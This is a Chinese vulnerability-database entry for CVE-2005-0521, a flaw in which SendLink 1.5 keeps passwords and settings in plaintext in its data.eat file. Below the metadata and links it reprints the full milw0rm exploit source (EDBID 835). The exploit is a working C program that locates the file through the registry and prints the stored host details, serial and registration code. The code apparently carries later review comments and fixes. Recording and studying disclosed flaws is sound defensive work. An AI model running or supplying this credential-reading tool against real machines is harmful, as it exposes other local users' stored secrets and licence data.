CVE-2005-0521
CVSS2.1
发布时间 :2005-02-23 00:00:00
修订时间 :2008-09-05 16:46:32
NMCOE    

[原文]SendLink 1.5 stores sensitive information, possibly including passwords, in plaintext in the data.eat file, which allows local users to gain privileges.


[CNNVD]SendLink data.eat文件敏感信息泄露漏洞(CNNVD-200502-088)

        SendLink是一款小巧便捷的网络共享软件。
        SendLink 1.5将可能包含密码在内的敏感信息以纯文本格式存储在data.eat文件中,这可让本地用户获取特权。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0521
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0521
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-088
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1013269
(VENDOR_ADVISORY)  SECTRACK  1013269

- 漏洞信息

SendLink data.eat文件敏感信息泄露漏洞
低危 未知
2005-02-23 00:00:00 2005-10-20 00:00:00
本地  
        SendLink是一款小巧便捷的网络共享软件。
        SendLink 1.5将可能包含密码在内的敏感信息以纯文本格式存储在data.eat文件中,这可让本地用户获取特权。

- 公告与补丁

        

- 漏洞信息 (835)

SendLink 1.5 Local Password Disclosure Exploit (EDBID:835)
windows local
2005-02-22 Verified
0 Kozan
N/A [点击下载]
/*****************************************************************

SendLink v1.5 Local Exploit by Kozan

Application: SendLink v1.5
Vendor:Computer Knacks
http://www.computerknacks.com/

Vulnerability Description: SendLink v1.5 discloses passwords to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <windows.h>
#include <stdio.h>
#include <string.h>

/* Capacity in bytes of prgfiles; also sizes the search-key buffer(s) in main(). */
#define BUFSIZE 100
/* Registry key handle that main() opens with RegOpenKeyEx. */
HKEY hKey;
/*
 * Receives the ProgramFilesDir registry value; main() then appends the
 * 23-character "\SendLink\User\data.eat" suffix to it in place.
 * NOTE(review): the value plus suffix plus terminator must fit in BUFSIZE.
 */
char prgfiles[BUFSIZE];
/* In/out byte count handed to RegQueryValueEx for prgfiles. */
DWORD dwBufLen=BUFSIZE;
/* Status code returned by RegQueryValueEx. */
LONG lRet;

/* Values returned by oku() for each field name; assigned and printed in main(). */
char *hostip, *hostname, *serial, *options, *regcode, *hostport;

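/*
 * adresal: locate the first occurrence of the byte string Str in a file.
 *
 * FilePath  path of the file to scan (opened read-only, binary mode)
 * Str       NUL-terminated pattern to look for
 *
 * Returns the zero-based byte offset of the first match, or -1 when the
 * file cannot be opened, an argument is NULL, the pattern is empty, or the
 * pattern does not occur. The offset is narrowed to int because that is the
 * function's return type.
 *
 * Changes from the earlier version of this routine:
 *   - fclose() is no longer called on a NULL stream when fopen() fails
 *     (undefined behaviour);
 *   - after a partial match the scan resumes at the very next byte, so a
 *     candidate position is no longer skipped;
 *   - one-character patterns can match (the old "i > strlen(Str)-2" test
 *     wrapped around for length 1);
 *   - getc() is stored in an int so a 0xFF data byte is not confused with EOF;
 *   - an empty pattern returns -1 instead of looping forever.
 */
int adresal(char *FilePath,char *Str)
{
      FILE *di;
      size_t len;
      size_t matched = 0;   /* pattern bytes matched at the current start */
      long start = 0;       /* file offset of the current candidate match */
      int ch;

      if( FilePath == NULL || Str == NULL )
              return -1;

      len = strlen(Str);
      if( len == 0 )
              return -1;

      di = fopen(FilePath,"rb");
      if( di == NULL )
              return -1;

      while( (ch = getc(di)) != EOF )
      {
              if( (unsigned char)Str[matched] == (unsigned char)ch )
              {
                      if( ++matched == len )
                      {
                              fclose(di);
                              return (int)start;
                      }
                      continue;
              }

              /*
               * Mismatch. If some bytes had matched, the stream is ahead of
               * the next candidate and must be rewound to start+1; if none
               * had matched, the single getc() already left it there.
               */
              if( matched > 0 && fseek(di,start+1,SEEK_SET) != 0 )
                      break;
              start++;
              matched = 0;
      }

      fclose(di);
      return -1;
}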

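/*
 * oku ("read"): return the text that follows the marker Str in a file.
 *
 * FilePath  path of the file to read (opened read-only, binary mode)
 * Str       NUL-terminated marker; its position is found with adresal()
 *
 * Reads the bytes that come after the first occurrence of Str, stopping at
 * the first 0xBB byte, at end of file, or when the result buffer is full.
 *
 * Returns a NUL-terminated string. An empty string is returned when an
 * argument is NULL, the marker is not found, or the file cannot be opened
 * or positioned. The returned pointer refers to a static buffer that the
 * next call overwrites, so callers must use or copy the value before
 * calling oku() again; the function is therefore not reentrant.
 *
 * Changes from the earlier version of this routine:
 *   - the result lived in an automatic array whose address was returned,
 *     leaving the caller with a dangling pointer; it is now static;
 *   - writes are bounded by the buffer size, so a value with no 0xBB
 *     terminator in the file can no longer overflow the buffer;
 *   - getc() is stored in an int and end of file is tested directly, so the
 *     EOF indicator is no longer appended to the result as a data byte.
 */
char *oku(char *FilePath,char *Str)
{
      static char Feature[500];
      FILE *di;
      int cr;
      size_t i = 0;
      int Offset;

      if( FilePath == NULL || Str == NULL )
              return "";

      Offset = adresal(FilePath,Str);
      if( Offset == -1 )
              return "";

      if( (di=fopen(FilePath,"rb")) == NULL )
              return "";

      /* Position the stream on the first byte after the marker. */
      if( fseek(di,(long)Offset+(long)strlen(Str),SEEK_SET) != 0 )
      {
              fclose(di);
              return "";
      }

      /* Leave room for the terminator; 0xBB ends the value in the file. */
      while( i < sizeof Feature - 1 && (cr=getc(di)) != EOF )
      {
              if( cr == 0xBB )
                      break;

              Feature[i] = (char)cr;
              i++;
      }

      Feature[i] = '\0';
      fclose(di);
      return Feature;
}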

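/*
 * Entry point of the CVE-2005-0521 demonstration: shows that SendLink 1.5
 * keeps its settings in clear text in data.eat under the Program Files
 * directory, where any local account able to read the file can see them.
 *
 * Steps: read ProgramFilesDir from the registry, build the path to
 * data.eat, then print the value stored after each "<name>\xBB=\xAB"
 * marker. Always returns 0, as before.
 *
 * Changes from the earlier version of this routine:
 *   - RegCloseKey() is only called on a key that was actually opened;
 *   - the registry value is explicitly NUL-terminated (registry strings are
 *     not guaranteed to be stored with a terminator);
 *   - the path suffix is appended only when it fits in prgfiles, instead of
 *     an unchecked strcat() into a 100-byte buffer;
 *   - the "Serial" line prints serial (it printed hostip);
 *   - the try/catch wrapper is gone: it is not C, and nothing here throws.
 */
int main(void)
{
       static const char suffix[] = "\\SendLink\\User\\data.eat";
       char key[BUFSIZE];    /* marker text handed to oku() for each field */

       if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                  "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                  0,
                  KEY_QUERY_VALUE,
                  &hKey) != ERROR_SUCCESS)
       {
               /* The key was never opened, so there is no handle to close. */
               printf("An error occured!\n");
               return 0;
       }

       /* Offer one byte less than the buffer so a terminator always fits. */
       dwBufLen = BUFSIZE - 1;
       lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
                               (LPBYTE)prgfiles, &dwBufLen);
       RegCloseKey(hKey);

       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE - 1) )
       {
               printf("An error occured!\n");
               return 0;
       }
       prgfiles[dwBufLen] = '\0';

       /* sizeof suffix counts its terminator, so this is the full need. */
       if( strlen(prgfiles) + sizeof suffix > BUFSIZE )
       {
               printf("An error occured!\n");
               return 0;
       }
       strcat(prgfiles,suffix);

       printf("SendLink v1.5 Local Exploit by Kozan\n");
       printf("Credits to ATmaCA\n");
       printf("www.netmagister.com  -  www.spyinstructors.com \n\n");

       /* Each value is printed before the next oku() call is made. */
       wsprintf(key,"hostip%c=%c",0xBB,0xAB);
       hostip=oku(prgfiles,key);
       printf("Host IP: %s\n",hostip);

       wsprintf(key,"hostname%c=%c",0xBB,0xAB);
       hostname=oku(prgfiles,key);
       printf("Hostname                        : %s\n",hostname);

       wsprintf(key,"hostport%c=%c",0xBB,0xAB);
       hostport=oku(prgfiles,key);
       printf("Host Port                        : %s\n",hostport);

       wsprintf(key,"options%c=%c",0xBB,0xAB);
       options=oku(prgfiles,key);
       printf("Options                                : %s\n",options);

       wsprintf(key,"serial%c=%c",0xBB,0xAB);
       serial=oku(prgfiles,key);
       printf("Serial                                : %s\n",serial);

       wsprintf(key,"regcode%c=%c",0xBB,0xAB);
       regcode=oku(prgfiles,key);
       printf("Registration Code        : %s\n",regcode);

       return 0;
}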

// milw0rm.com [2005-02-22]
		

- 漏洞信息

14140
SendLink data.eat Local Password Disclosure
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-02-23 Unknown
2005-02-23 Unknown

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 
